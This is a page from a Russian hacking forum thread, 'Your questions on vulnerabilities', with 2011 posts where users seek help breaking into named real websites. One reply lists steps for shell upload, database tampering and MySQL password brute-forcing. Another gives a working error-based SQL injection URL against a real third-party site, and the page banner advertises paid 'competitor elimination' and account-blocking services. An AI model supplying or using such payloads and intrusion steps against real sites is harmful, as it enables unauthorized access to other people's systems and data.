Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1714 из 2438

1714

Опции темы

Поиск в этой теме

Опции просмотра

#17131

31.05.2011, 17:15

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

эм... зайти под админом и повысить свои права;залить шелл, найти конфиг и отредактировать бд; если открыта бд mysql сбрутить пасс, найти пхпмайадмин и опять же повысить свои права

З.Ы. какой вопрос такой ответ

#17132

31.05.2011, 17:29

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

Провел на форуме:
0

Репутация: 0

Ну в принципе я об этом тоже думал,логин и пасс от мускла у меня есть,только не расшифровывается)

Думал есть какие нить варианты как в таблице бд поменять значение.

#17133

01.06.2011, 00:33

0x002

Новичок

Регистрация: 30.05.2011

Сообщений: 3

Провел на форуме:
982

Репутация: 0

Помогите уважаемые гуру.

и так вот сайтик:

http://rswow.ru/page.php?p[]=rules

Вылазит такая штука

Цитата:

Сообщение от None

Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in Y:\home\195.88.62.202\www\page.php on line 14

Подскажите как то заюзать данную штуку.

Заранее спасибо.

#17134

01.06.2011, 00:37

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

mysql_real_escape_string() принимает параметр типа стринг, о чем и говорит имя фунцкии, а ты передаешь массив, вот и ругается..

#17135

01.06.2011, 00:38

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Цитата:

Сообщение от 0x002

Помогите уважаемые гуру.
и так вот сайтик:
http://rswow.ru/page.php?p[]=rules
Вылазит такая штука
Подскажите как то заюзать данную штуку.
Заранее спасибо.

Например, так:

http://wow.war-top.ru/index.php?do=sitedetails&id=74'+and+(select+1+from +(select+count(0),concat((select+version()),floor( rand(0)*2))+from+(select+1+union+select+2+union+se lect+3)x+group+by+2+limit+1)a)+--+

#17136

01.06.2011, 00:54

0x002

Новичок

Регистрация: 30.05.2011

Сообщений: 3

Провел на форуме:
982

Репутация: 0

Цитата:

Сообщение от Konqi

Я понял что тип стринг

Цитата:

Сообщение от None

mysql_real_escape_string() - используется для защиты от sql атак

#17137

01.06.2011, 00:56

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от 0x002

Я понял что тип стринг
Цитата:
mysql_real_escape_string() - используется для защиты от sql атак

и что?

ты же не будешь проверить на SQL injection через подставку массива вместо стринга

тебе выше показали запрос

#17138

01.06.2011, 01:06

krypt3r

Познавший АНТИЧАТ

Регистрация: 27.04.2007

Сообщений: 1,044

Провел на форуме:
3660186

Репутация: 905

Раскрытие пути, не более того

#17139

01.06.2011, 02:19

0x002

Новичок

Регистрация: 30.05.2011

Сообщений: 3

Провел на форуме:
982

Репутация: 0

Прошу помощи

вот http://wow.bridge.net.ua/index.php?n=server&sub=arena&realm=-1

Цитата:

Сообщение от None

Check field dbinfo in table `realmlist` for realm id=

#17140

01.06.2011, 02:22

Expl0ited

Познавший АНТИЧАТ

Регистрация: 16.07.2010

Сообщений: 1,022

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от 0x002

Прошу помощи
вот http://wow.bridge.net.ua/index.php?n=server&sub=arena&realm=-1

Где ты там увидел уязвимость?

Страница 1714 из 2438

1714

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход